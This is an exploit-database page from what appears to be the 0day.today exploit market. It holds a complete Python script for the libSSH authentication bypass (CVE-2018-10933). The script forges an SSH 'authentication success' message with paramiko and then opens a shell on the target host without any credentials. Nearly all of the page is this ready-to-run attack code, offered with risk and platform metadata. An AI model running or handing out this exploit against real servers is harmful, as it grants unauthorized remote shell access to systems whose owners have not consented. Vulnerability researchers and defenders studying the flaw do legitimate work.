[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

libSSH - Authentication Bypass Exploit

Author
Dayanç Soyadlı
Risk
[
Security Risk High
]
0day-ID
0day-ID-31367
Category
remote exploits
Date add
19-10-2018
CVE
CVE-2018-10933
Platform
linux
#!/usr/bin/env python3
import paramiko
import socket
import argparse
from sys import argv, exit
 
 
parser = argparse.ArgumentParser(description="libSSH Authentication Bypass")
parser.add_argument('--host', help='Host')
parser.add_argument('-p', '--port', help='libSSH port', default=22)
parser.add_argument('-log', '--logfile', help='Logfile to write conn logs', default="paramiko.log")
 
args = parser.parse_args()
 
 
def BypasslibSSHwithoutcredentials(hostname, port):
     
    sock = socket.socket()
    try:
        sock.connect((str(hostname), int(port)))
 
        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()
   
        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)
     
        spawncmd = transport.open_session()
        spawncmd.invoke_shell()
        return 0
     
    except paramiko.SSHException as e:
        print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable")
        return 1
    except socket.error:
        print("Unable to connect.")
        return 1
 
 
def main():
    paramiko.util.log_to_file(args.logfile)
    try:
        hostname = args.host
        port = args.port
    except:
        parser.print_help()
        exit(1)
    BypasslibSSHwithoutcredentials(hostname, port)
 
if __name__ == '__main__':
    exit(main())

#  0day.today [2024-11-16]  #